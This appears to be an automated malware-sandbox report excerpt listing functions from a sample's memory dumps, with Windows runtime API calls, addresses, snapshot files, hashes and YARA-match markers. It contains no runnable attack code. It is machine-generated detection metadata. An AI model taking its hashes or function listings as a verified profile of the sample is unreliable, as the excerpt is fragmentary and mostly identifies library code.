GetLastError.KERNEL32 ref: 00413541
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
__CxxThrowException@8.LIBVCRUNTIME ref: 00413565

Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC

Function 02483773 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0248378C

Part of subcall function 02482B16: ___crtGetTimeFormatEx.LIBCMT ref: 02482B2C
Part of subcall function 02482B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02482B4B

GetLastError.KERNEL32 ref: 024837A8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024837BE
__CxxThrowException@8.LIBVCRUNTIME ref: 024837CC

Part of subcall function 024828EC: SetThreadPriority.KERNEL32(?,?), ref: 024828F8

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction ID: e51a998379e4b3c636d34c8559c38a4a408a90c82ab74436e28557c2a3370fe2
Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction Fuzzy Hash: 29F0A7B2A102153AE720FB769C06FBF3A9C9B01B51F50496BBD45E7181EED8D4048AB8

Function 0247D486 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 02481342

Part of subcall function 02480BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02480BD6
Part of subcall function 02480BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 02480BF7

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 02481355
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 02481361
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0248136A

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
Instruction ID: d4842b68a2eb84245293d0a70945d3623d9e5558dd8407c15733678881363b1e
Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
Instruction Fuzzy Hash: 5EF0B431621704A7AF147EB608105BE31975F51324B04416FE52A9F380DEB59E069A94

Function 0248D074 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0248D088
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0248D0AC
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0248D0BF
__CxxThrowException@8.LIBVCRUNTIME ref: 0248D0CD

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3657713681-0
Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction ID: 94217204aee43c245b57ddc909e2e4abb0a71c09cbc103126ec9398bb114652a
Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction Fuzzy Hash: 41F05931E11204E3C724FB66D840C9EB37A8E92B18770856FD805172C5DB31A94ACE62

Function 004125F1 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
__CxxThrowException@8.LIBVCRUNTIME ref: 0041263B

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768

Function 02475A67 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

std::_Cnd_initX.LIBCPMT ref: 02475A83
__Cnd_signal.LIBCPMT ref: 02475A8F
std::_Cnd_initX.LIBCPMT ref: 02475AA4
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 02475AAB

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction ID: 1d93e98a7279ee29cd4f44be268100be2dcdc93a5e947aa8c804c8063abbf2d6
Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction Fuzzy Hash: 6FF0EC71410700DFEB317773D8057DA73A6AF01328F14451FD0795A990CFB5E8145E55

Function 02482858 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 0248286F
GetLastError.KERNEL32(?,?,?,?,02488830,?,?,?,?,00000000,?,00000000), ref: 0248287E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02482894
__CxxThrowException@8.LIBVCRUNTIME ref: 024828A2

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction ID: 70a05af022c638a1edb475b4b130ff98d0fbfffb5b6052c80cb2eb65102ab050
Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction Fuzzy Hash: 45F0303550014ABBCF10FFA5CD45EAF37B86B00751F600656B915E61A0DB75D6049B64

Function 00412316 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 0041232C
GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
__CxxThrowException@8.LIBVCRUNTIME ref: 0041235E

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC

Function 0248257D Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 02482593
GetLastError.KERNEL32(?,?,?,?,?,02480DA0), ref: 024825A1
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024825B7
__CxxThrowException@8.LIBVCRUNTIME ref: 024825C5

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction ID: 452940a9c2cbff8c27988d2a34783926729a1d1a02ba9c90c1676f6da1e7dfaf
Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction Fuzzy Hash: 78E0D87165025539E710F77A4C12F7F36DC5B00B41F440956BD15E11C1FFD4D10049B8

Function 004192C9 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8

TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
GetLastError.KERNEL32 ref: 00423991
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
__CxxThrowException@8.LIBVCRUNTIME ref: 004239B5

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D

Function 02489530 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02482959: TlsAlloc.KERNEL32(?,02480DA0), ref: 0248295F

TlsAlloc.KERNEL32(?,02480DA0), ref: 02493BE6
GetLastError.KERNEL32 ref: 02493BF8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02493C0E
__CxxThrowException@8.LIBVCRUNTIME ref: 02493C1C

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction ID: c75cf1be0ba8b0ebd8faa3945242bf4a786f4bab695e1ced4cc2fe62c022bf4c
Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction Fuzzy Hash: 47E06834500202AFCB00FF779C49A7F3E686A023017100E6BE525D21A1EF34D0068EAC

Function 0041252D Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,00410B39,?,?,?,00000000), ref: 00412537
GetLastError.KERNEL32(?,?,?,00000000), ref: 00412546
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041256A

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C

Function 02482794 Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,02480DA0,?,?,?,00000000), ref: 0248279E
GetLastError.KERNEL32(?,?,?,00000000), ref: 024827AD
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024827C3
__CxxThrowException@8.LIBVCRUNTIME ref: 024827D1

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction ID: 3a004793667cdad15ed708c278e2eb265b6b293adbb13b2d4906a12d889341ec
Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction Fuzzy Hash: B0E08074510149A7CB00FBB6DD45EAF77BC6A00B05B600566A541E3190EB64D7048B79

Function 00412685 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 00412691
GetLastError.KERNEL32 ref: 0041269D
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
__CxxThrowException@8.LIBVCRUNTIME ref: 004126C1

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C

Function 0041274B Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
__CxxThrowException@8.LIBVCRUNTIME ref: 00412787

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C

Function 024828EC Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 024828F8
GetLastError.KERNEL32 ref: 02482904
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0248291A
__CxxThrowException@8.LIBVCRUNTIME ref: 02482928

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction ID: 6bdd722bb6f6267576dccc9c198659edf368ef9c4099716b17cf10c88709ef7f
Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction Fuzzy Hash: 19E086346101096BCB14FF76CC05BBF376C6B00745B500926BC55D20A0EF79D1048AAC

Function 024829B2 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,02487BD8,00000000,?,?,02480DA0,?,?,?,00000000,?,00000000), ref: 024829BE
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 024829CA
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024829E0
__CxxThrowException@8.LIBVCRUNTIME ref: 024829EE

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction ID: 777ef01c951a7e125f9b0e7ec1c04890caf91ed541871510d7ac9227cbf2b22f
Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction Fuzzy Hash: 04E086352101096BDB10FF75CC08BBF376C6F00745B500926BD59D10A0EF75D1149AAC

Function 004126F2 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
GetLastError.KERNEL32 ref: 00412705
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
__CxxThrowException@8.LIBVCRUNTIME ref: 00412729

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C

Function 02482959 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,02480DA0), ref: 0248295F
GetLastError.KERNEL32 ref: 0248296C
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02482982
__CxxThrowException@8.LIBVCRUNTIME ref: 02482990

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction ID: e6ae053326569088123ac172e3d09ea79bb09a4af3f6f20b39d29d3f18cb0259
Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction Fuzzy Hash: 4FE02B301101456BC714FBBD9C4CB7F32AC6B01715BA00F2BF861E20E0EFA8D1084AAC

Function 00411E98 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

Concurrency::critical_section::unlock.LIBCMT ref: 00411E9C

Part of subcall function 00411112: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00411133
Part of subcall function 00411112: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0041116A
Part of subcall function 00411112: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411176

Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411EA8

Part of subcall function 00410A83: Concurrency::critical_section::unlock.LIBCMT ref: 00410AA7

Concurrency::Context::Block.LIBCONCRT ref: 00411EAD

Part of subcall function 00412C61: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00412C63

Concurrency::critical_section::lock.LIBCONCRT ref: 00411ECD

Part of subcall function 0041103B: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00411049
Part of subcall function 0041103B: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00411056
Part of subcall function 0041103B: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00411061

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
String ID:
API String ID: 3659872527-0
Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
Instruction ID: 9d2f70e3251d3db540e969485d70697033c14617760f295063863c07ed990fb6
Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
Instruction Fuzzy Hash: BCE0DF34500502ABCB08FB21C5A25ECFB61BF88354B50821FE462432E2CF785E87DB88

Function 024820FF Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

Concurrency::critical_section::unlock.LIBCMT ref: 02482103

Part of subcall function 02481379: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0248139A
Part of subcall function 02481379: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 024813D1
Part of subcall function 02481379: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 024813DD

Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0248210F

Part of subcall function 02480CEA: Concurrency::critical_section::unlock.LIBCMT ref: 02480D0E

Concurrency::Context::Block.LIBCONCRT ref: 02482114

Part of subcall function 02482EC8: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02482ECA

Concurrency::critical_section::lock.LIBCONCRT ref: 02482134

Part of subcall function 024812A2: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 024812B0
Part of subcall function 024812A2: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 024812BD
Part of subcall function 024812A2: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 024812C8

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
String ID:
API String ID: 3659872527-0
Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
Instruction ID: cac33b1527446063a4cc46baa9da76d26afef70897e8634251290038e0664877
Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
Instruction Fuzzy Hash: 5CE0DF359201069BCB08FF22C5604ACBB62BF81310B14430FD46A472E0CF746E4ACF84

Function 0042F07D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0042F10D

Strings

pow, xrefs: 0042F0E5, 0042F102

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
